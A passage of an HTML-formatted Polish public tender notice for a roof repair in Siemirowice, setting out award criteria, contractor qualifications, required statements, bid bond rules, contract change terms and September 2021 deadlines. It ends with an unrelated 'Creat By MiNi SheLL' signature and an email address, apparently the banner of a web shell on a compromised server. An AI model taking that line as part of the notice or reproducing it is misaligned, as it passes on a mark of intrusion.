wady</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">deklarowany okres rekojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wymaga, aby Wykonawca potwierdził posiadanie zdolności technicznej<br/>lub zawodowej poprzez wykazanie:<br/>a. Wykonania co najmniej 2 robót budowlanych odpowiadającej swoim rodzajem przedmiotowi<br/>zamówienia (robota dekarska związane z wymianą pokrycia dachowego, wykonanie konstrukcji<br/>dachowej, remont dachu) o wartości nie mniejszej niż 180 000,00 złotych brutto każdawykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem jej rodzaju,<br/>wartości, daty, miejsca wykonania i podmiotów, na rzecz których robota ta została wykonana, z<br/>załączeniem dowodów określających, czy roboty te zostały wykonane należycie, w<br/>szczególności informacji o tym, czy roboty zostały wykonane zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone.<br/>b. Skierowania do realizacji zamówienia publicznego co najmniej 1 osobę posiadającą ważne<br/>uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej<br/>(kierownik budowy), lub inne prawem dopuszczone na podstawie wcześniej obowiązujących<br/>przepisów <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie<br/>niepodlegania wykluczeniu</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunku udziału w<br/>postępowaniu dotyczącego zdolności technicznej lub zawodowej, Zamawiający wymaga, aby<br/>Wykonawca przedstawił następujące podmiotowe środki dowodowe:<br/>a) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wraz z<br/>podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których te roboty<br/>zostały wykonane oraz załączeniem dowodów określających, czy te roboty budowlane zostały<br/>wykonane należycie. Dowodami, o których mowa powyżej są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane.<br/>b) Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat<br/>ich uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nich czynności oraz informacją o podstawie dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych<br/>wykonywanych wspólnie z innymi Wykonawcami wykaz robót dotyczy robót budowlanych, w<br/>których wykonaniu Wykonawca bezpośrednio uczestniczył.<br/>W odniesieniu do warunków dotyczących WYKSZTAŁCENIA, KWALIFIKACJI ZAWODOWYCH<br/>LUB DOŚWIADCZENIA wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogąpolegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane, do<br/>realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie z art. 117 ust 4, z<br/>którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy.Wykonawca, który<br/>polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby składa, wraz z ofertą<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów. Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty<br/>udostępniające zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub<br/>ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w<br/>postępowaniu oraz bada, czy nie zachodzą wobec tych podmiotów podstawy wykluczenia, o<br/>których mowa w art. 108 ust 1 ustawy20. Na dzień składania ofert każdy Wykonawca powinien<br/>złożyć następujące dokumenty:a) formularz oferty sporządzony na podstawie wzoru<br/>stanowiącego załącznik nr 1;b) oświadczenia z art. 125 ust. 1 ustawy Wykonawcypotwierdzające spełnianie warunków udziału w postępowaniu o treści zgodnej z załącznikiem nr<br/>2;c) oświadczenie z art. 125 ust 1 ustawy Wykonawcy potwierdzające brak podstaw do<br/>wykluczenia o treści zgodnej z załącznikiem nr 3d) wykaz części zamówienia, których wykonanie<br/>zostanie powierzone podwykonawcy o treści zgodnej z załącznikiem nr 9 – jeżeli dotyczy e)<br/>zobowiązanie podmiotu udostępniającego zasoby – jeżeli dotyczy, o treści zgodnej z<br/>załącznikiem nr 10f) oświadczenie z art. 125 ust 5 ustawy podmiotu udostępniającego zasoby<br/>potwierdzające niepodleganie wykluczeniu z postępowania i spełnianie warunków udziału w<br/>postępowaniu o treści zgodnej z załącznikiem nr 4g) Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie z art. 117 ust 4 ustawy, z którego<br/>wynika, które roboty budowlane wykonają poszczególni Wykonawcy o treści zgodnej z<br/>załącznikiem nr 7 h) stosowne pełnomocnictwa lub inne dokumenty potwierdzające umocowanie<br/>do reprezentowania Wykonawcy w przypadku, gdy nie wynika ono bezpośrednio z dokumentów<br/>dołączonych do oferty;i) w przypadku Wykonawców wspólnie ubiegających się o realizację<br/>zamówienia dokument ustanawiający Pełnomocnika do reprezentowania w postępowaniu lub do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia<br/>publicznego lub inne dokumenty potwierdzające umocowanie osoby reprezentującej<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia do ich reprezentowania<br/>Zamawiający wzywa Wykonawcę, którego oferta zostanie najwyżej oceniona do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych: a) wykaz<br/>robót o treści zgodnej z załącznikiem nr 6; b) wykaz osób skierowanych do realizacji zamówienia<br/>publicznego o treści zgodnej z załącznikiem nr 8;c) oświadczenia z art. 125 ust 1 od<br/>podwykonawcy niebędącego podmiotem udostępniającym zasoby w zakresie niepodlegania<br/>wykluczeniu z postępowania o treści zgodnej z załącznikiem nr 5 <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zasady wnoszenia wadium<br/>1. Zamawiający wymaga wniesienia wadium w kwocie 2 500,00 zł<br/>2. Wadium może być wnoszone zgodnie z wyborem Wykonawcy w jednej lub kilku<br/>następujących formach<br/>a. Pieniądzu – przelewem na rachunek bankowy Zamawiającego Bank Spółdzielczy w Łebie<br/>o/Czarna Dąbrówka nr 54 9324 1018 0022 6556 2000 0340 z dopiskiem wadium na remont<br/>dachu w Siemirowicach; za termin wniesienia wadium w formie pieniężnej zostanie przyjęta data<br/>uznania rachunku Zamawiającego; kserokopię dowodu wpłaty wadium potwierdzoną przez<br/>Wykonawcę należy dołączyć do oferty<br/>b. Gwarancjach bankowych<br/>c. Gwarancjach ubezpieczeniowych<br/>d. Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust 5 pkt 2 ustawy z dnia<br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>3. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>4. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje<br/>Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej<br/>5. W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia,<br/>powinny one zostać sporządzone zgodnie z obowiązującym prawem i winny zawierać<br/>następujące elementy:<br/>• Nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji lub poręczenia<br/>(Zamawiającego), gwaranta lub poręczyciela (banku lub instytucji ubezpieczeniowej udzielającejgwarancji lub poręczenia) oraz wskazanie ich siedzib;<br/>• Określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem;<br/>• Kwotę gwarancji lub poręczenia;<br/>• Termin ważności gwarancji lub poręczenia;<br/>• Zobowiązania gwaranta lub poręczyciela do: zapłacenia kwoty gwarancji lub poręczenia na<br/>pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie o zaistnieniu którejkolwiek<br/>z sytuacji określonej w art. 98 ust 6 ustawy, skutkującej koniecznością zatrzymania wadium<br/>Wykonawcy, dla którego wystawiono odpowiednio gwarancję lub poręczenie.<br/>6. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje się nieprzerwanie do<br/>upływu terminu związania ofertą, zawarcia umowy ws zamówienia publicznego lub<br/>unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji, gdy nie zostało<br/>rozstrzygnięte odwołanie na unieważnienie postępowania lub nie upłynął termin do jego<br/>wniesienia<br/>7. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem<br/>okresu ważności wadium albo jeżeli nie jest to możliwe z wniesieniem nowego wadium na<br/>przedłużony okres związania ofertą. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienie, zgodnie z art. 58<br/>w związku z art. 445 ust 1 ustawy PZP Zamawiający żąda aby:1) W przypadku oferty składanej<br/>wspólnie przez Wykonawców oświadczenie z art. 125 ust 1 składa każdy z Wykonawców<br/>odrębnie. Oświadczenia te potwierdzają brak podstawy wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnienie<br/>warunków udziału w postępowaniu.2) W przypadku Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia uznaje się, iż warunek dotyczący uprawnień do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej jest spełniony, jeśli co najmniej jeden z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane (usługi,<br/>dostawy), do których realizacji te uprawnienia są wymagane. 3) W odniesieniu do warunków<br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców,<br/>którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. 4)<br/>W przypadku, o którym mowa w ust 2 i 3 powyżej, Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane (dostawy, usługi) wykonają poszczególni Wykonawcy 5) Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia ustanawiają Pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia lub do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego. Załączone Pełnomocnictwo powinno zawierać:<br/>jednoznaczne określenie postępowania, do którego się odnosi i precyzować zakres<br/>umocowania; wymieniać wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia i zawierać podpisy każdego z nich;6) Jeżeli w imieniu Wykonawców<br/>wspólnieubiegających się o udzielenie zamówienia działa osoba, której umocowanie do ich<br/>reprezentowania nie wynika z dokumentów takich jak KRS lub odpis z właściwego rejestru,<br/>Zamawiający będzie wymagał od Wykonawców wspólnie ubiegających się o<br/>udzieleniezamówienia przedstawienia pełnomocnictwa lub innego dokumentu potwierdzającego<br/>umocowanie tej osoby do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. 7) wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem lub<br/>osobą działającą w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia;8)<br/>w przypadku wyboru przez Zamawiającego oferty złożonej przez Wykonawców wspólnie<br/>ubiegających się o zamówienie, Wykonawcy zobowiązani będą do przedłożenia umowy<br/>regulującej współpracę Wykonawców w terminie nie krótszym niż 7 dni przed podpisaniemumowy w sprawie zamówienia publicznego;9) umowa , o której mowa w ust 8 niniejszego<br/>rozdziału winna zawierać w szczególności: oznaczenie stron, cel działania, czas trwania umowy,<br/>zasady współdziałania , w tym zakres prac powierzonych każdej ze stron oraz zasady<br/>dokonywania rozliczeń, w tym nazwę banku i numer rachunku, na który dokonywane będą<br/>płatności z tytułu realizacji zamówienia.10) Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie<br/>zabezpieczenia należytego wykonania umowy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany postanowień umowy, na skutek wystąpienia poniższych okoliczności mogą dotyczyć<br/>następujących jej elementów:1) terminu wykonania zamówienia 2) terminów płatności 3)<br/>parametrów przedmiotu zamówienia4) wynagrodzenia .5) podwykonawstwa w przypadkach<br/>określonych w dokumentach zamówienia Nadto Zamawiający przewiduje możliwość dokonania<br/>zmian:1) zmiany dokonanej na podstawie art. 23 pkt 1 ustawy Prawo budowlane – zmiana w<br/>rozwiązaniach projektowych, jeżeli są one uzasadnione koniecznością zwiększenia<br/>bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy;2) zmiany<br/>dokonanej na podstawie art. 20 ust. 1 pkt 4 lit. a ustawy Prawo budowlane – uzgodniona<br/>możliwość wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie,<br/>zgłoszonych przez Kierownika budowy lub przedstawiciela Zamawiającego;3) zmiany dokonanej<br/>podczas wykonywania robót i nie odstępującej w sposób istotny od zatwierdzonego projektu;4)<br/>zmiany postanowień umowy o zamówienie publiczne w przypadku stwierdzenia, że okoliczności<br/>związane z wystąpieniem COVID-19 wpływają na należyte wykonanie umowy;5) zmiany osób<br/>uczestniczących w realizacji przedmiotu umowy, zmiany kierownika budowy lub osób<br/>odpowiedzialnych za kierowanie robotami budowlanymi z zastrzeżeniem, iż nowe osoby będą<br/>spełniały wymagania określone w postępowaniu w sprawie udzielenia zamówienia publicznego,<br/>w wyniku którego została zawarta niniejsza umowa;6) zamawiający zastrzega sobie prawo do<br/>zmiany inspektora nadzoru inwestorskiego.W przypadku wystąpienia okoliczności wskazanych<br/>w ust. 3 pkt 1) umowy, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu<br/>umowy, termin ten może ulec przedłużeniu, nie dłużej jednak niż o czas trwania tych<br/>okoliczności.W przypadku wystąpienia okoliczności stanowiących podstawę do zmiany<br/>postanowień umowy Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym<br/>fakcie Zamawiającego i wystąpienia z pisemnym wnioskiem o dokonanie zmian w przedmiotowej<br/>umowie.Jeżeli Zamawiający uzna, że okoliczności wskazane przez Wykonawcę jako stanowiące<br/>podstawę umowy nie są zasadne, Wykonawca zobowiązany jest do realizacji zadania zgodne z<br/>warunkami zawartymi w umowie.Powyższe postanowienia stanowią katalog zmian, na które<br/>Zamawiający może wyrazić zgodę. Nie stanowią natomiast zobowiązania Zamawiającego do<br/>wyrażenia zgody na ich wprowadzenie.Zmiana umowy podlega unieważnieniu, jeśli została<br/>dokonana z naruszeniem art. 454 i art. 455 ustawy. W takim przypadku stosuje<br/>się postanowienia umowne w brzmieniu obowiązującym przed tą zmianą.Strony umowy<br/>zawierają stosowny aneks w celu dokonania zmian w niniejszej umowie uwzględniający warunki<br/>zmiany umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-28 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę składa się w języku polskim pod rygorem nieważności w formie elektronicznej lub postaci elektronicznej, opatrzonej podpisem zaufanym lub podpisem osobistym na Platformie dostępnej pod adresem https://cewice.ezamawiajacy.pl w zakładce OFERTY</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-28 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-27</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o<br/>zwalczaniu nieuczciwej konkurencji, jeżeli Wykonawca, wraz z przekazaniem tych informacji<br/>zastrzegł, że nie mogą być one udostępnione oraz wykazał, iż zastrzeżone informacje stanowią<br/>tajemnicę przedsiębiorstwa. W przypadku, gdy dokumenty elektroniczne w postępowaniu,<br/>przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/>tajemnicę przedsiębiorstwa Wykonawca w celu utrzymania w poufności tych informacji,<br/>przekazuje je w wydzielonym i odpowiednio wydzielonym pliku. Wykonawca nie może zastrzec<br/>informacji zawartych w ofercie dotyczących nazwy lub imion i nazwisk oraz siedziby lub miejsca<br/>prowadzenia działalności gospodarczej albo miejsca zamieszkania oraz ceny. Proponuje się,<br/>aby zastrzeżenie dokonane było przez złożenie oferty w dwóch częściach opisanych jako „część<br/>jawna oferty” oraz „część zastrzeżona oferty”. Zgodnie z art. 11 ust 2 ustawy z dnia 16 kwietnia<br/>1993 r o zwalczaniu nieuczciwej konkurencji (Dz. U. 2018 poz. 419) poprzez pojęcie tajemnicy<br/>przedsiębiorstwa rozumie się informacje techniczne, technologiczne, organizacyjne<br/>przedsiębiorstwa lub inne informacje posiadające wartość gospodarczą, które jako całość lub w<br/>szczególnym zestawieniu i zbiorze ich elementów nie są powszechnie znane osobom zwykle<br/>zajmującym się tym rodzajem informacji albo nie są łatwo dostępne dla takich osób, o ile<br/>uprawniony do korzystania z informacji lub rozporządzania nimi podjął, przy zachowaniu<br/>należytej staranności, działania w celu utrzymania ich poufności

Creat By MiNi SheLL
Email: jattceo@gmail.com